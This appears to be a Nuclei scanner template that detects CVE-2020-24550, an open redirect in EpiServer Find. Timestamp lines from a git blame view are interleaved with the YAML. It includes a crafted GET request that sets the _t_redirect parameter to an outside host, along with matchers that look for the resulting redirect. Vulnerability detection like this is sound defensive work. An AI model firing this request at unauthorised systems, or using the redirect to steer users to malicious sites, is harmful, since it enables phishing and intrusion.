2021-04-02 08:41:43 +00:00
id : CVE-2020-24550
info :
2022-10-19 21:11:27 +00:00
name : EpiServer Find <13.2.7 - Open Redirect
2021-04-02 08:41:43 +00:00
author : dhiyaneshDK
severity : medium
2022-10-19 21:11:27 +00:00
description : EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-04-22 10:38:41 +00:00
reference :
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-24550
cwe-id : CWE-601
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:*
epss-score : 0.00157
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,redirect,episerver
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-04-02 08:41:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-02 08:41:43 +00:00
- method : GET
path :
2022-06-06 10:40:15 +00:00
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
2021-04-02 09:01:43 +00:00
2021-04-02 08:41:43 +00:00
matchers-condition : and
matchers :
- type : word
2022-05-08 06:43:38 +00:00
part : header
2021-04-02 08:41:43 +00:00
words :
2022-06-06 10:40:15 +00:00
- "Location: https://interact.sh"
2022-05-08 06:43:38 +00:00
2021-04-02 08:41:43 +00:00
- type : status
status :
- 301